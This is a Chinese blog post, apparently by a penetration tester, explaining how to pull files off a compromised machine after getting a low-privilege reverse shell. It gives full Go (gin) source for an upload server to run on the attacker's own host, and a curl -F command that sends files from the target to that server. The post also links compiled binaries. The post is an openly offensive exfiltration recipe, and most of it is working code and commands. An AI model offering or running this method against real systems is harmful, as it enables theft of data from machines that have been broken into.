至少我们曾经在一起过。
来自:一言
说明
现在有一种情况,反弹了一个低权限的shell[aru_17],然后该网站又没有web服务,然后用scp命令也是权限不够(需要验证密码),通过网上查询方法说使用 sshpass 可以进行带密码执行scp命令,但是需要安装这个命令,当前权限并不能安装该命令[aru_28],所以在大表哥的提示下,可以采用curl命令进行文件回传的操作。[aru_21]
条件
1.一台服务器(这个肯定要的[aru_13])
2.目标服务器能够执行curl命令。
方法
1.采用golang编写一个简单的获取文件上传的后端(用golang的话可以避免安装环境等操作,当然你也可以用别的语言来搞一个[aru_62])
点击查看后端源码
main.go文件
package main
import (
"flag"
"go-upload/runserver"
)
func main() {
filedir := flag.String("f", "", "保存路径")
lport := flag.String("p", "8088", "运行端口")
flag.Parse()
if *filedir != "" && *lport != "" {
runserver.Runserver(*filedir, *lport)
} else {
flag.Usage()
}
}
root.go文件
package runserver
import (
"fmt"
"github.com/gin-gonic/gin"
"net/http"
)
/*
* @Author: A
* @Date: 2021/7/6 11:32
*/
func Runserver(filedir string, lport string) {
r := gin.Default()
b := filedir
r.POST("/upload", func(c *gin.Context) {
file, err := c.FormFile("file")
//fmt.Println(file.Filename)
s := b + "/" + file.Filename
if err != nil {
c.String(500, "err")
}
// c.JSON(200, gin.H{"message": file.Header.Context})
err = c.SaveUploadedFile(file, s)
if err != nil {
c.String(http.StatusOK, "err")
}
c.String(http.StatusOK, "ok")
})
r.Run(":" + lport)
}
2.curl命令参数(根据环境更改)
curl -F "file=@文件路径" http://localhost:8088/upload ##上传成功会回显ok
下载
上方提供了源码,如果懒得编译的可以直接下载。编译了windows和linux下64位的运行程序。
蓝奏云本文作者为TRY,转载请注明。